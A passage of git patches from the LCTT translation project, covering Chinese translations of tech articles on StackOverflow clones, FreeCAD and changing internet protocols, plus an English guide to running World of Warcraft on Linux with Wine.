Stackoverflow 的实现抽象成下面一段逻辑和代码 ```SQL create table QUESTION (ID identity primary key, @@ -49,15 +49,15 @@ create table RESPONSE (ID identity primary key, 但这种简单的实现却远远不能体现出 StackOverflow 的精髓。无论你对 StackOverflow 的感觉如何,大多数使用者似乎都同意 StackOverflow 的用户体验从头到尾都很流畅。使用 StackOverflow 的过程就是在跟一个精心打磨过的产品在愉快地交互。即使我没有深入了解过 StackOverflow ,我也能猜测出这个产品的成功和它数据库的 Schema 没有多大关系 - 实际上在有幸研读过 StackOverflow 的源码之后,我得以印证了自己的想法,StackOverflow 的成功确实和它的数据库设计关系甚小。真正让它成为一个极其易用的网站的原因,是它背后各种精雕细琢的设计和实施。多数的开发人员在谈及仿制和克隆一款产品的难度时,真的很少会去考虑到产品背后的打磨和雕琢工作,因为他们认为这些打磨和雕琢都是偶然的,甚至是无足轻重的。 -这就是为什么用开源工具去克隆和山寨 StackOverflow 其实是很容易失败的。即使这些开源开发者只是想去实现 StackOverflow 的主要的“规范和标准特性”,而非全面的高级特性,他们也会在实现的过程中遇到种种关键和核心的问题,让他们阴沟翻船,半途而废。拿 Badge (徽章功能)来说,如果你要针对普通终端用户来设计 Badge , 则要么需要实现一个用户可用来个性化设置 bagdge 的 GUI,要么则取巧的设计出一个比较通用的 Badge 供所有的安装版本来使用。而开源设计的实际情况是,开发者会有很多的抱怨和牢骚,认为给 Badge 这种东西设计一个功能全面的 GUI 是根本不肯能的。而且他们会固执地把任何标准 badge 的提案踢回去,踢出第一宇宙速度,击穿地壳甩到地球的另一端。最终这些开发者还是会搞出一个类似于 Roundup 的 bug tracker 正在使用的流程和方案:即实现一个通用的机制, 以便那些可以自如使用基于 Python 或 Php 或其他语言的 的系统API的人可以轻松的定制化他们自己的 Badge。而且老实说,PHP 和 Python 比任何可能的 GUI 接口要 好用和强大得多,谁还会考虑 GUI 的方案呢?(出自开源开发者的想法) +这就是为什么用开源工具去克隆和山寨 StackOverflow 其实是很容易失败的。即使这些开源开发者只是想去实现 StackOverflow 的主要的“规范和标准特性”,而非全面的高级特性,他们也会在实现的过程中遭遇种种关键和核心的问题,让他们阴沟翻船,半途而废。拿 Badge (徽章功能)来说,如果你要针对普通终端用户来设计 Badge , 则要么需要实现一个用户可用来个性化设置 bagdge 的 GUI,要么则取巧的设计出一个比较通用的 Badge 供所有的安装版本来使用。而开源设计的实际情况是,开发者会有很多的抱怨和牢骚,认为给 Badge 这种东西设计一个功能全面的 GUI 是根本不肯能的。而且他们会固执地把任何标准 badge 的提案踢回去,踢出第一宇宙速度,击穿地壳甩到地球的另一端。最终这些开发者还是会搞出一个类似于 Roundup 的 bug tracker 程序都在使用的流程和方案:即实现一个通用的机制, 提供以 Python 或 Php 为基础的一些系统API, 以便那些可以自如使用 Python 或 Php 的人可以轻松的通过这些编程接口来定制化他们自己的 Badge。而且老实说,PHP 和 Python 可是比任何可能的 GUI 接口都要好用和强大得多,为什么还要考虑 GUI 的方案呢?(出自开源开发者的想法) -同样的,开源开发者会认为那些系统设置和管理员界面也一样可以省略掉。在他们看来,假如你是一个管理员,有 SQL 服务器的权限,那么你就理所当然的具备那些系统管理员该有的知识和技能。那么你其实可以使用 Djang-admin 或者任何类似的工具来轻松的对 StackOverflow 做很多设置和改造工作。毕竟如果你是一个 mods (懂如何mod的人)那么你肯定知道网站是怎么工作的,懂得如何利用专业工具去设置和改造一个网站。对啊!这不就得了! 毋庸置疑,在开源开发者重做他们自己的 StackOverflow 的时候,他们也不会把任何 StackOverflow 在接口上面的失败设计纠正过来。即使是原版 StackOverflow 里面最愚蠢最失败的那个设计 - 即要求用户必须拥有一个 OpenID 并知道如何使用它 - 在某个将来最终被 StackOverflow 删除和修正掉了, 我相信正在复制 StackOverflow 模式的那些开源克隆产品也还是会不假思索的把这个 OpenID 的功能仿制出来。这就好比是 GNOME 和 KDE 多年以来一直在做的事情,他们并没有把精力放在如何在设计之初就避免 Windows 的那些显而易见的毛病和问题,相反的确是在亦步亦趋的重复着 Windows 的设计,想办法用开源的方式做出一个比拟 Windows 功能的系统。 +同样的,开源开发者会认为那些系统设置和管理员界面也一样可以省略掉。在他们看来,假如你是一个管理员,有 SQL 服务器的权限,那么你就理所当然的具备那些系统管理员该有的知识和技能。那么你其实可以使用 Djang-admin 或者任何类似的工具来轻松的对 StackOverflow 做很多设置和改造工作。毕竟如果你是一个 mods (懂如何mod的人)那么你肯定知道网站是怎么工作的,懂得如何利用专业工具去设置和改造一个网站。对啊!这不就得了! 毋庸置疑,在开源开发者重做他们自己的 StackOverflow 的时候,他们也不会把任何 StackOverflow 在接口上面的失败设计纠正过来。即使是原版 StackOverflow 里面最愚蠢最失败的那个设计(即要求用户必须拥有一个 OpenID 并知道如何使用它)在某个将来最终被 StackOverflow 删除和修正掉了, 我相信正在复制 StackOverflow 模式的那些开源克隆产品也还是会不假思索的把这个 OpenID 的功能仿制出来。这就好比是 GNOME 和 KDE 多年以来一直在做的事情,他们并没有把精力放在如何在设计之初就避免 Windows 的那些显而易见的毛病和问题,相反的确是在亦步亦趋的重复着 Windows 的设计,想办法用开源的方式做出一个比拟 Windows 功能的系统。 -开发者可能不会关心一个应用的上述设计细节,但是终端用户一定会。尤其是当他们在尝试去选择要使用哪个应用的时候,这些终端用户更会重视这些接口设计是否易用。就好像一家好的软件公司希望通过确保其产品在出货之前就有一流的质量,以降低之后的售后维护支持成本一样,懂行的消费者也会想要在他们购买这些产品之前就确保产品好用,以便他们不需要在使用的时候不知所措,然后去打电话给售后服务来解决问题。开源产品就失败在这里,而且相当之失败。一般来讲,付费软件则在这方面做得好很多。 +开发者可能不会关心一个应用的上述设计细节,但是终端用户一定会。尤其是当他们在尝试去选择要使用哪个应用的时候,这些终端用户更会重视这些接口设计是否易用。就好像一家好的软件公司希望通过确保其产品在出货之前就有一流的质量,以降低售后维护支持的成本一样,懂行的消费者也会在他们购买这些产品之前就确保产品好用,以防在使用的时候不知所措,然后无奈的打电话给售后来解决问题。开源产品就失败在这里,而且相当之失败。一般来讲,付费软件则在这方面做得好很多。 -这不是说开源软件没有自己的立足之地,这个博客就运行在 Apache,Django,PostgreSQL 和 Linux 搭建的开源系统之上。但是让我来告诉你吧,配置这些堆栈可不是谁都可以做的。老版本的 PostgreSQL 需要手工配置 Vacuuming 来确保数据库的自动清理,而且即使是最新版本的 ubuntu 和 FreeBSD 也仍然要求用户去手工配置他们的第一个数据库集群。 -相比之下,MS SQL (微软的 SQL) 则不需要你手工配置以上的任何一样东西。至于 Apache ... 我的天,Apache 简直复杂到让我根本来不及尝试给哪个新的用户讲解我们如何可以通过一个一次性的安装过程就能把虚拟机,MovableType,几个 Diango apps 和 WordPress 配置在一起并流畅地使用。单单是给那些技术背景还不错但并非软件开发者的用户解释清楚 Apache 的那些针对多进程和多线程的设置参数就已经够我喝一壶的了。相比之下,微软的 IIS 7 或者是使用了 OS X 服务器的那个几乎闭源的 GUI 管理器的 Apache ,在配置的时候就要简单上不止一个数量级了。Django 确实是一个好的开源产品,但它也只是一个基础构架,而并非是一个可以直接面向终端普通用户的商业产品。而开源真正的强项正是在这种基础构架的开发和创新上,这也是驱使开发者贡献开源的最本真的动力。 +这不是说开源软件没有自己的立足之地,这个博客就运行在 Apache,Django,PostgreSQL 和 Linux 搭建的开源系统之上。但是让我来告诉你吧,配置这些堆栈可不是谁都可以做的。老版本的 PostgreSQL 需要手工配置 Vacuuming 来确保数据库的自动清理,而即使是最新版本的 ubuntu 和 FreeBSD 也仍然要求用户去手工配置他们的第一个数据库集群。 +相比之下,MS SQL (微软的 SQL) 则不需要你手工配置以上的任何一样东西。至于 Apache ... 我的天,Apache 简直复杂到让我根本来不及去尝试给一个新用户讲解我们如何可以通过一个一次性的安装过程就能把虚拟机,MovableType,几个 Diango apps 和 WordPress 配置在一起并流畅地使用。单单是给那些技术背景还不错但并非软件开发者的用户解释清楚 Apache 的那些针对多进程和多线程的设置参数就已经够我喝一壶的了。相比之下,微软的 IIS 7 或者是使用了 OS X 服务器的那个几乎闭源的 GUI 管理器的 Apache ,在配置的时候就要简单上不止一个数量级了。Django 确实是一个好的开源产品,但它也只是一个基础构架,而并非是一个可以直接面向终端普通用户的商业产品。而开源真正的强项就恰恰在这种基础构架的开发和创新上,这也正是驱使开发者为开源做贡献的最本真的动力。 所以我的结论是,如果下次你再看到一个你喜欢的应用程序,请好好细心地揣摩一下这款产品,揣摩一下所有的那些针对用户的体贴入微的设计细节。而不是武断的认为你可以轻轻松松的再一周之内就用开源工具做一个和这个应用一摸一样的产品出来。那些认为制作和实现一个应用程序如此简单的人,十之八九都是因为忽略了软件开发的最终产品是要交给用户去用的。 From bf21408b30d1d2c1152d9ed29310549f1d7ad965 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 15 Dec 2017 07:01:43 +0800 Subject: [PATCH 0567/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Play?= =?UTF-8?q?=20World=20of=20Warcraft=20On=20Linux=20With=20Wine?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ay World of Warcraft On Linux With Wine.md | 107 ++++++++++++++++++ 1 file changed, 107 insertions(+) create mode 100644 sources/tech/20170928 How to Play World of Warcraft On Linux With Wine.md diff --git a/sources/tech/20170928 How to Play World of Warcraft On Linux With Wine.md b/sources/tech/20170928 How to Play World of Warcraft On Linux With Wine.md new file mode 100644 index 0000000000..00f32793dc --- /dev/null +++ b/sources/tech/20170928 How to Play World of Warcraft On Linux With Wine.md @@ -0,0 +1,107 @@ +translating by lujun9972 +How to Play World of Warcraft On Linux With Wine +====== + +### Objective + +Install and run Word of Warcraft on Linux + +### Distributions + +This will work with nearly all Linux distributions. + +### Requirements + +A working Linux install with root privileges and a somewhat modern graphics card with the latest graphics drivers installed. + +### Difficulty + +Easy + +### Conventions + + * **#** \- requires given command to be executed with root privileges either directly as a root user or by use of `sudo` command + * **$** \- given command to be executed as a regular non-privileged user + + + +### Introduction + +World of Warcraft has been around for almost thirteen years, and it's still easily the most popular MMORPG. Unfortunately, after all that time Blizzard never released an official Linux client. It's not all bad, tough. Wine has you covered. + +### Install Wine + +You can try regular Wine, but it's not the best for getting the latest improvements in gaming performance. Wine Staging and Wine with the Gallium Nine patches are almost universally better. If you're using proprietary drivers, Wine Staging is the best option. For Mesa drivers, make sure that Gallium Nine support is compiled in(it probably is), and use Wine with the Gallium patches. + +Refer to our + +### Winecfg + +Open up `winecfg`. On the first tab, make sure the that version of Windows is set to `Windows 7`. Blizzard dropped support for all prior versions. Next, head to the "Staging" tab. The options you choose here depend on whether you're running the staging or Gallium patches. + +![Winecfg Staging Settings][1] +Everyone should check the boxes to enable VAAPI and EAX. Hiding the Wine version is up to you. + +If you're using the Staging patches, check the box to enable CSMT. If you're on Gallium Nine, check that box. You can't have both. + +### Winetricks + +This next part requires Winetricks. If you're not familiar with it, Winetricks is a script that you can use to install various Windows libraries and components in Wine to help programs run. You can read more about it in our + +![Winetricks Corefonts Installed][2] +There are only a couple of things that you need to get WoW, and more importantly the Battle.net launcher, to work. First, install `corefonts` under the "Fonts" section. This next part is optional, but if you want all of the data from the Internet to display in the Battle.net client, you need to install `ie8` from the DLL section. + +### Battle.net + +Now that you have Wine set up and ready, you can install the Battle.net app. The Battle.net app serves as the installer and update utility for WoW and other Blizzard games. It's also known for misbehaving after updates. Be sure to check + +You can download the Battle.net app from + +When the download completes, open the `.exe` with Wine, and follow the install instructions. Everything here should go normally and will be exactly the same as running it natively on Windows. + +![Battle.net Launcher With WoW Installed][3] +After the app is done installing, sign in or create your account. It'll then take you to the launcher where you can install and manage your games. Start installing WoW. It will take a while. + +### Launch The Game + + +![WoW Advanced Settings][4] +You should be able to start up WoW with the "Play" button in the Battle.net app. It'll take a few minutes for the login screen to appear, and it'll probably perform like garbage. That's because WoW uses DX11 by default now. Head to the settings, and under the "Advanced" tab, set the graphics API to DX9. Save, and exit the game. Open it back up again after it exists successfully + +The game should be playable now. Keep in mind that performance will be highly dependent on your hardware. WoW is a CPU bound game, and Wine adds additional CPU overhead. If you don't have a powerful CPU, you'll probably be feeling the negative effects. WoW does have low presets, though, so you can tune down the graphics to get it working. + +#### Performance Tuning + + +![WoW Graphics Settings][5] +It's really hard to say what settings will work best for you and your system. WoW has a very simple sliding scale in the basic settings. If you've been playing on Windows, drop it by a couple of levels. The performance simply isn't as good. + +Always try turning down the obvious culprits first. Settings like anti-aliasing and particles are usually to blame for poor performance. Also, take a look at windowed vs. fullscreen. Sometimes it's amazing how much of a difference there is between the two. + +WoW also has an option for raid and battleground settings. This creates a separate set of options for more graphically intense content in raid and battleground instances. Sometimes WoW performs great in the open world, but drops to trash when there's a lot of players on screen. + +Experiment and see what works best for your system. It all depends on your hardware and your system configuration. + +### Closing Thoughts + +World of Warcraft has never been released for Linux, but it has worked in Wine for years. In fact, it's hard to think of any time when it hasn't worked. There have even been rumors that Blizzard developers test it in Wine to make sure that it remains functional. + +With that said, changes and patches do impact this venerable game, so always be on your toes if something breaks. Regardless, there is almost always a solution right around the corner, you just need to find it. + + +-------------------------------------------------------------------------------- + +via: https://linuxconfig.org/how-to-play-world-of-warcraft-on-linux-with-wine + +作者:[Nick Congleton][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linuxconfig.org +[1]:https://linuxconfig.org/images/wow-wine-staging.jpg +[2]:https://linuxconfig.org/images/wow-wine-corefonts.jpg +[3]:https://linuxconfig.org/images/wow-bnet.jpg +[4]:https://linuxconfig.org/images/wow-api.jpg +[5]:https://linuxconfig.org/images/wow-settings.jpg From ffbe596e65aa1c1e7c4cdd32ee45d89b54f70f2e Mon Sep 17 00:00:00 2001 From: geekpi Date: Fri, 15 Dec 2017 09:00:57 +0800 Subject: [PATCH 0568/1627] translated --- ...3D Modeling and Design Software for Linux.md | 82 ------------------- 1 file changed, 82 deletions(-) delete mode 100644 sources/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md diff --git a/sources/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md b/sources/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md deleted file mode 100644 index fbcbacaf7f..0000000000 --- a/sources/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md +++ /dev/null @@ -1,82 +0,0 @@ -translating---geekpi - -FreeCAD – A 3D Modeling and Design Software for Linux -============================================================ -![FreeCAD 3D Modeling Software](https://www.fossmint.com/wp-content/uploads/2017/12/FreeCAD-3D-Modeling-Software.png) - -[FreeCAD][8] is a cross-platform OpenCasCade-based mechanical engineering and product design tool. Being a parametric 3D modeler it works with PLM, CAx, CAE, MCAD and CAD and its functionalities can be extended using tons of advanced extensions and customization options. - -It features a QT-based minimalist User Interface with toggable panels, layouts, toolbars, a broad Python API, and an Open Inventor-compliant 3D scene representation model (thanks to the Coin 3D library). - - [![FreeCAD 3D Software](https://www.fossmint.com/wp-content/uploads/2017/12/FreeCAD-3D-Software.png)][9] - -FreeCAD 3D Software - -As is listed on the website, FreeCAD has a coupled of user cases, namely: - -> * The Home User/Hobbyist: Got yourself a project you want to build, have built, or 3D printed? Model it in FreeCAD. No previous CAD experience required. Our community will help you get the hang of it quickly! -> -> * The Experienced CAD User: If you use commercial CAD or BIM modeling software at work, you will find similar tools and workflow among the many workbenches of FreeCAD. -> -> * The Programmer: Almost all of FreeCAD’s functionality is accessible to Python. You can easily extend FreeCAD’s functionality, automatize it with scripts, build your own modules or even embed FreeCAD in your own application. -> -> * The Educator: Teach your students a free software with no worry about license purchase. They can install the same version at home and continue using it after leaving school. - -#### Features in FreeCAD - -* Freeware: FreeCAD is free for everyone to download and use. - -* Open Source: Contribute to the source code on [GitHub][4]. - -* Cross-Platform: All Windows, Linux, and Mac users can enjoy the coolness of FreeCAD. - -* A comprehensive [Online Documentation][5]. - -* A free [Online Manual][6] for beginners and pros alike. - -* Annotations support e.g. text and dimensions. - -* A built-in Python console. - -* A fully customizable and scriptable UI. - -* An online community for showcasing projects [here][7]. - -* Extendable modules for modeling and designing a variety of objects e.g. - -FreeCAD has a lot more features to offer users than we can list here so feel free to see the rest of them on its website’s [Features page][11]. - -There are many 3D modeling tools in the market but they are barely free. If you are a modeling engineer, architect, or artist and are looking for an application you can use without necessarily shelling out any cash then FreeCAD is a beautiful open-source project you should check out. - -Give it a test-drive and see if you don’t like it. - -[Download FreeCAD for Linux][13] - -Are you already a FreeCAD user? Which of its features do you enjoy the most and have you come across any alternatives that may go head to head with its abilities? - -Remember that your comments, suggestions, and constructive criticisms are always welcome in the comments section below. - --------------------------------------------------------------------------------- - -via: https://www.fossmint.com/freecad-3d-modeling-and-design-software-for-linux/ - -作者:[Martins D. Okoi ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.fossmint.com/author/dillivine/ -[1]:https://www.fossmint.com/author/dillivine/ -[2]:https://www.fossmint.com/author/dillivine/ -[3]:https://www.fossmint.com/freecad-3d-modeling-and-design-software-for-linux/#disqus_thread -[4]:https://github.com/FreeCAD/FreeCAD -[5]:https://www.freecadweb.org/wiki/Main_Page -[6]:https://www.freecadweb.org/wiki/Manual -[7]:https://forum.freecadweb.org/viewforum.php?f=24 -[8]:http://www.freecadweb.org/ -[9]:https://www.fossmint.com/wp-content/uploads/2017/12/FreeCAD-3D-Software.png -[10]:https://www.fossmint.com/synfig-an-adobe-animate-alternative-for-gnulinux/ -[11]:https://www.freecadweb.org/wiki/Feature_list -[12]:http://www.tecmint.com/red-hat-rhcsa-rhce-exam-certification-book/ -[13]:https://www.freecadweb.org/wiki/Download From 687f823bc9abdc514e4d89a4439061e65a9591f2 Mon Sep 17 00:00:00 2001 From: geekpi Date: Fri, 15 Dec 2017 09:01:55 +0800 Subject: [PATCH 0569/1627] translated --- ...3D Modeling and Design Software for Linux.md | 80 +++++++++++++++++++ 1 file changed, 80 insertions(+) create mode 100644 translated/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md diff --git a/translated/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md b/translated/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md new file mode 100644 index 0000000000..1788a51f83 --- /dev/null +++ b/translated/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md @@ -0,0 +1,80 @@ +FreeCAD - Linux 下的 3D 建模和设计软件 +============================================================ +![FreeCAD 3D Modeling Software](https://www.fossmint.com/wp-content/uploads/2017/12/FreeCAD-3D-Modeling-Software.png) + +[FreeCAD][8]是一个基于 OpenCasCade 的跨平台机械工程和产品设计工具。作为参数化 3D 建模工具,它可以与 PLM、CAx、CAE、MCAD 和 CAD 协同工作,并且可以使用大量高级扩展和自定义选项扩展其功能。 + +它有基于 QT 的简约用户界面,具有可切换的面板、布局、工具栏、大量的 Python API 以及符合 Open Inventor 的 3D 场景表示模型(感谢 Coin 3D 库)。 + + [![FreeCAD 3D Software](https://www.fossmint.com/wp-content/uploads/2017/12/FreeCAD-3D-Software.png)][9] + +FreeCAD 3D 软件 + +正如在网站上所列出的,FreeCAD 有一些使用案例,即: + +> * 家庭用户/业余爱好者:有一个想要构建,或已经已经构建,或者 3D 打印的项目么?在 FreeCAD 中建模。无需之前的 CAD 经验。我们的社区将帮助你快速掌握它! +> +> * 有经验的 CAD 用户:如果你在工作中使用商业 CAD 或 BIM 建模软件,你会在 FreeCAD 的许多工作台中找到类似的工具和工作流程。 +> +> * 程序员:几乎所有的 FreeCAD 功能都可以用 Python 访问。你可以轻松扩展 FreeCAD 的功能,使用脚本将其自动化,创建自己的模块,甚至将 FreeCAD 嵌入到自己的程序中。 +> +> * 教育者:教给你的学生一个免费的软件,不用担心购买许可证。他们可以在家里安装相同的版本,并在离开学校后继续使用它。 + +#### FreeCAD 中的功能 + +* 免费软件:FreeCAD 免费供所有人下载和使用。 + +* 开源:在 [GitHub][4] 上开源。 + +* 跨平台:所有的 Windows、Linux 和 Mac 用户都可以享受 FreeCAD 的功能。 + +* 全面的[在线文档][5]。 + +* 一个给初学者和专业人士的免费[在线手册][6]。 + +* 注释支持。例如:文字和尺寸。 + +* 内置的 Python 控制台。 + +* 完全可定制和脚本化的用户界面。 + +* [这里][7]有展示项目的在线社区。 + +* 用于建模和设计各种物体的可扩展模块。 + +FreeCAD 为用户提供的功能比我们在这里列出的多得多,所以请随时在其网站的[功能页面][11]上查看其余的功能。 + +市场上有很多 3D 建模工具,但几乎没有免费的。如果你是建模工程师、建筑师或艺术家,并且正在寻找可以使用的程序,而不必花费现金,那么 FreeCAD 是一个非常漂亮的开源项目,你应该看一下。 + +尝试一下它,看看你是否不喜欢它。 + +[下载 Linux 下的 FreeCAD][13] + +准备成为 FreeCAD 用户了么?你最喜欢哪个功能?你有没有遇到过与它功能相近的其他软件? + +欢迎在下面的评论区留下你的留言、建议和建设性的批评。 + +-------------------------------------------------------------------------------- + +via: https://www.fossmint.com/freecad-3d-modeling-and-design-software-for-linux/ + +作者:[Martins D. Okoi ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.fossmint.com/author/dillivine/ +[1]:https://www.fossmint.com/author/dillivine/ +[2]:https://www.fossmint.com/author/dillivine/ +[3]:https://www.fossmint.com/freecad-3d-modeling-and-design-software-for-linux/#disqus_thread +[4]:https://github.com/FreeCAD/FreeCAD +[5]:https://www.freecadweb.org/wiki/Main_Page +[6]:https://www.freecadweb.org/wiki/Manual +[7]:https://forum.freecadweb.org/viewforum.php?f=24 +[8]:http://www.freecadweb.org/ +[9]:https://www.fossmint.com/wp-content/uploads/2017/12/FreeCAD-3D-Software.png +[10]:https://www.fossmint.com/synfig-an-adobe-animate-alternative-for-gnulinux/ +[11]:https://www.freecadweb.org/wiki/Feature_list +[12]:http://www.tecmint.com/red-hat-rhcsa-rhce-exam-certification-book/ +[13]:https://www.freecadweb.org/wiki/Download From 2b4cff362487c84bbd5a5cbc934950cbe92f9ff7 Mon Sep 17 00:00:00 2001 From: geekpi Date: Fri, 15 Dec 2017 09:04:36 +0800 Subject: [PATCH 0570/1627] translating --- ...12 How to Search PDF Files from the Terminal with pdfgrep.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171212 How to Search PDF Files from the Terminal with pdfgrep.md b/sources/tech/20171212 How to Search PDF Files from the Terminal with pdfgrep.md index 20b454236c..55eb9e369c 100644 --- a/sources/tech/20171212 How to Search PDF Files from the Terminal with pdfgrep.md +++ b/sources/tech/20171212 How to Search PDF Files from the Terminal with pdfgrep.md @@ -1,3 +1,5 @@ +translating---geekpi + How to Search PDF Files from the Terminal with pdfgrep ====== Command line utilities such as [grep][1] and [ack-grep][2] are great for searching plain-text files for patterns matching a specified [regular expression][3]. But have you ever tried using these utilities to search for patterns in a PDF file? Well, don't! You will not get any result as these tools cannot read PDF files; they only read plain-text files. From fcf53f1ae9472a924fc795fca7d63314ab930c91 Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 15 Dec 2017 11:01:10 +0800 Subject: [PATCH 0571/1627] PRF:20171212 Internet protocols are changing.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 校对部分 --- ...0171212 Internet protocols are changing.md | 63 +++++++++---------- 1 file changed, 31 insertions(+), 32 deletions(-) diff --git a/translated/tech/20171212 Internet protocols are changing.md b/translated/tech/20171212 Internet protocols are changing.md index afbc568ed9..feb3694105 100644 --- a/translated/tech/20171212 Internet protocols are changing.md +++ b/translated/tech/20171212 Internet protocols are changing.md @@ -1,68 +1,67 @@ -因特网协议正在发生变化 +互联网协议正在发生变化 ============================================================ - ![](https://blog.apnic.net/wp-content/uploads/2017/12/evolution-555x202.png) -在上世纪九十年代,当因特网开始被广泛使用的时候,大部分的通讯只使用几个协议:IPv4 路由包,TCP 转发这些包到连接上,SSL(后来的 TLS)加密连接,DNS 命名连接上的主机,HTTP 是最常用的应用程序协议。 +当上世纪九十年代互联网开始被广泛使用的时候,其大部分的通讯只使用几个协议:IPv4 协议路由这些数据包,TCP 协议转发这些包到连接上,SSL(及后来的 TLS)协议加密连接,DNS 协议命名那些所要连接的主机,而 HTTP 协议是最常用的应用程序协议。 -多年以来,这些核心的因特网协议的变化几乎是可以忽略的;HTTP 增加了几个新的报文头和方法,TLS 缓慢地进行了一点小修改,TCP 调整了拥塞控制,而 DNS 引入了像 DNSSEC 这样的特性。这些协议本身在很长一段时间以来都面向相同的 “线上(on the wire)” 环境(除了 IPv6,它已经引起网络运营商们的大量关注)。 +多年以来,这些核心的互联网协议的变化几乎是微乎其微的;HTTP 增加了几个新的报文头和请求方式,TLS 缓慢地进行了一点小修改,TCP 调整了拥塞控制,而 DNS 引入了像 DNSSEC 这样的特性。这些协议看起来很长时间都一成不变(除了已经引起网络运营商们的大量关注的 IPv6)。 -因此,网络运营商、供应商、和政策制定者们,他们想去了解(并且有时是想去管理),因特网基于上面的这些协议的“影响(footpring)”已经采纳了的大量的实践 — 是否打算去调试问题、改善服务质量、或者强制实施策略。 +因此,希望了解(甚至有时控制)互联网的网络运营商、供应商和决策者对这些协议采用的做法是基于其原有工作方式 —— 无论是打算调试问题,提高服务质量,或施加政策。 -现在,核心因特网协议的重要改变已经开始了。虽然它们的目的是与因特网兼容(因为,如果不兼容的话,它们不会被采纳),但是它们可以破坏那些在协议方面进行非法使用的人的自由,或者假设那些事件不会改变。 +现在,核心互联网协议的重要改变已经开始了。虽然它们意图与互联网大部分兼容(因为,如果不兼容的话,它们不会被采纳),但是它们可能会破坏那些在协议中没有规定的地方,或者根本就假设那些地方不存在变化。 -#### 为什么我们需要去改变因特网 +### 为什么我们需要去改变互联网 -那里有大量的因素推动这些变化。 +有大量的因素推动这些变化。 -首先,核心因特网协议的限制越来越明显,尤其是考虑到性能的时候。由于在应用程序和传输协议方面的结构上的问题,网络不能被高效地使用,导致终端用户感受到性能问题(特别是,延迟)。 +首先,核心互联网协议的局限性越来越明显,尤其是考虑到性能的时候。由于在应用和传输协议方面的结构性问题,网络没有得到高效使用,导致终端用户认为性能不能满足要求(特别是,网络延迟)。 -这就转化成进化或者替换这些协议的强烈的动机,因为有 [大量的经验表明,即便是很小的性能改善也会产生影响][14]。 +这就意味着人们有强烈的动机来演进或者替换这些协议,因为有 [大量的经验表明,即便是很小的性能改善也会产生影响][14]。 -第二,有能力去进化因特网协议 — 在任何层面上 — 随着时间的推移会变得更加困难,很大程度上要感谢上面所讨论的网络带来的意想不到的使用。例如,尝试去压缩响应的 HTTP 代理,使的部署一个新的压缩技术更困难;中间设备中的 TCP 优化使得部署一个对 TCP 的改善越来越困难。 +其次,演进互联网协议的能力 —— 无论在任何层面上 —— 会随着时间的推移变得更加困难,这主要是因为上面所讨论的对网络的非预期使用。例如,尝试去压缩响应的 HTTP 代理服务器使得部署新的压缩技术更困难;中间设备中的 TCP 优化使得部署对 TCP 的改进越来越困难。 -最后,[我们正处在一个更多地使用加密技术的因特网变化中][15],首次激起这种改变的事件是,2015 的 Edward Snowden 披露的信息(译者注:指的是美国中情局雇员斯诺登的事件)。那是一个单独讨论的话题,但是它的意义是,我们为确保协议可以进化,加密是其中一个很好的工具。 +最后,[我们正处在一个越来越多地使用加密技术的互联网变化当中][15],首次激起这种改变的事件是,2015 年 Edward Snowden 的披露事件(LCTT 译注:指的是美国中情局雇员斯诺登的事件)。那是一个单独讨论的话题,但是与之相关的是,加密技术是最好的工具之一,我们必须确保协议能够进化。 让我们来看一下都发生了什么,接下来会出现什么,它对网络有哪些影响,和它对网络协议的设计有哪些影响。 -#### HTTP/2 +### HTTP/2 -[HTTP/2][16](基于 Google 的 SPDY) 是第一个发生重大变化的 — 在 2015 年被标准化,它多路传输多个请求到一个 TCP 连接中,因此可以在客户端上不阻塞任何一个其它请求的情况下避免了请求队列。它现在已经被广泛部署,并且被所有的主流浏览器和 web 服务器支持。 +[HTTP/2][16](基于 Google 的 SPDY) 是第一个重大变化 —— 它在 2015 年被标准化。它将多个请求复用到一个 TCP 连接上,从而避免了客户端排队请求,而不会互相阻塞。它现在已经被广泛部署,并且被所有的主流浏览器和 web 服务器支持。 -从一个网络的角度来看,HTTP/2 的一些显著变化。首先,适合一个二进制协议,因此,任何假定它是 HTTP/1.1 的设备都会被中断。 +从网络的角度来看,HTTP/2 带来了一些显著变化。首先,这是一个二进制协议,因此,任何假定它是 HTTP/1.1 的设备都会出现问题。 -中断是在 HTTP/2 中另一个大的变化的主要原因;它有效地请求加密。这种改变的好处是避免了来自伪装的 HTTP/1.1 的中间人攻击,或者一些更狡滑的比如 “脱衣攻击” 或者阻止新的协议扩展 — 协议上的这两种情况都在工程师的工作中出现过,给他们带来了很明显的支持问题。 +这种破坏性问题是导致 HTTP/2 中另一个重大变化的主要原因之一:它实际上需要加密。这种改变的好处是避免了来自伪装的 HTTP/1.1 的中间人攻击,或者一些更细微的事情,比如 strip headers 或者阻止新的协议扩展 —— 这两种情况都在工程师对协议的开发中出现过,导致了很明显的支持问题。 -[当它被加密时,HTTP/2 也请求使用 TLS/1.2][17],并且 [黑名单][18] 密码组合已经被证明不安全 — 它只对暂时的密钥有效果。关于潜在的影响可以去看 TLS 1.3 的相关章节。 +[当它被加密时,HTTP/2 请求也要求使用 